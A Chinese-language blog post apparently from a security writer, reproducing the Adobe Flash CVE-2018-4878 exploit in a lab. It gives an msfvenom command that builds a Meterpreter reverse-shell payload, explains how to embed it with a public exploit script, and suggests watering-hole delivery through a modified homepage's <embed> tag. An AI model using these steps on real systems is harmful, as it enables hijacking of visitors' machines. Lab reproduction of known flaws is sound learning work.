Flash(CVE-2018-4878)漏洞复现及利用思路

作者: H0r2yC 分类: 漏洞利用 发布时间: 2019-08-01 00:06

​0x01 前言

做一篇flash的CVE-2018-4878漏洞,虽然是18年2月份的漏洞,但是该漏洞利用还不算小众,利用方式繁多,水坑攻击、URL跳转、钓鱼攻击等。稍提一下水坑攻击,可以先将swf文件上传到服务器,在通过修改主页源码,添加一个<embed>标签加载swf。

0x02 影响范围

详见adobe官方公告

https://helpx.adobe.com/cn/security/products/flash-player/apsb18-03.html

0x03 工具

https://github.com/anbai-inc/CVE-2018-4878

0x04 复现过程

首先需要一个shellcode,我们使用msfvenom生成

msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=192.168.131.129 LPORT=4444 -f python -o code.txt

接下来我们查看code.txt文件,内容如下,可见是将shellcode分段存储

将code.txt内容复制出,将cve-2018-4878.py的开头部分替换掉

接下来修改文件底部的保存路径,在当前目录下生成可以只留下’%s’ % swf,如

f = open(“%s” %swf,”wb”)

f = open(“index.html”,”wb”)

将文件稍微改了一下,然后运行py文件,将会生成两个文件,一个index.html,一个exploit.swf,这里的exploit.swf就是漏洞利用的swf了,如果是通过水坑攻击,可以先将该文件上传到服务器,在通过修改主页源码,添加一个<embed>标签加载swf。

搭建环境我直接使用本机的xampp,开启apache和mysql

生成的文件放入htdocs文件夹

先访问本机,测试正常

接下来配置监听参数,打开msf使用windows/meterpreter_reverse_tcp,设置shellcode监听ip以及对应的端口。

靶机环境:

访问包含swf的index页面触发漏洞,msf反弹shell

0x05 总结

    复现过程算不上多么复杂,其中遇到的几个坑提一下,希望能给大家复现过程一些帮助。

    1.尽量使用内置浏览器,部分浏览器如某歌浏览器,加载flash需要确认后才可触发shellcode。

    2.开启msf接收不到反弹shell,可能是由于不停切换桥接以及NAT导致出了些问题,重启或恢复快照解决。

     

如果觉得我的文章对您有用,欢迎关注我的公众号:网安成长笔记

发表评论